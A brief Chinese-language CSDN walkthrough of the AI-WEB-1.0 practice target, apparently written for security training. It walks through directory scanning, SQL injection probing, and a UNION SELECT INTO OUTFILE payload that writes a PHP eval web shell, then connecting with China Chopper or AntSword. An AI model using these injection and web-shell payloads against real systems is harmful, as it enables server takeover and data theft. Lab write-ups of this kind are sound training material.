CSDN AI-WEB-1.0 攻略

找到一个目标靶场的IP , 这里以172.16.1.98 为例

1、使用命令 /robots.txt 来确定目录

2、分别测试两个文件

均无法访问,可返回其根目录查询

3、到根目录,出现搜索框

4、输入ID为1

5、使用虚拟机kali的终端

搜索命令 dirsearch -u http://172.16.1.98/m3diNf0/

6、搜索文件 info.php

即可得到 WWW 所在的根目录

7、确定闭合方式 1'

8、确定字段

1' order by 3#

9、注入一句话"木马"

1' union select 1,2 ,'<?php @eval($_POST['cmd']);?>' into outfile '绝对路径' #

9、查看文件,木马是否注入成功

搜索 /s /up /sis.php

10、使用中国蚁键/中国菜刀等工具,进入该系统

++即可成功获取信息++

安全

网络安全人人有责,切勿知法犯法

相关推荐
日更嵌入式的打工仔4 分钟前
Ehercat代码解析中文摘录<1>
网络·笔记·ethercat
进击的野人5 分钟前
Vue Router 深度解析:从基础概念到高级应用实践
前端·vue.js·前端框架
北慕阳6 分钟前
健康管理前端记录
前端
1024小神7 分钟前
cloudflare的worker中的Environment环境变量和不同环境配置
前端
一只鹿鹿鹿10 分钟前
网络信息与数据安全建设方案
大数据·运维·开发语言·网络·mysql
栀秋66614 分钟前
从零开始调用大模型:使用 OpenAI SDK 实现歌词生成,手把手实战指南
前端·llm·openai
l1t15 分钟前
DeepSeek总结的算法 X 与舞蹈链文章
前端·javascript·算法
小快说网安21 分钟前
从合规到发展:新《网络安全法》如何重塑企业安全建设逻辑
安全·web安全·等保测评
么么...23 分钟前
深入理解数据库事务与MVCC机制
数据库·经验分享·sql·mysql
智航GIS36 分钟前
6.2 while循环
java·前端·python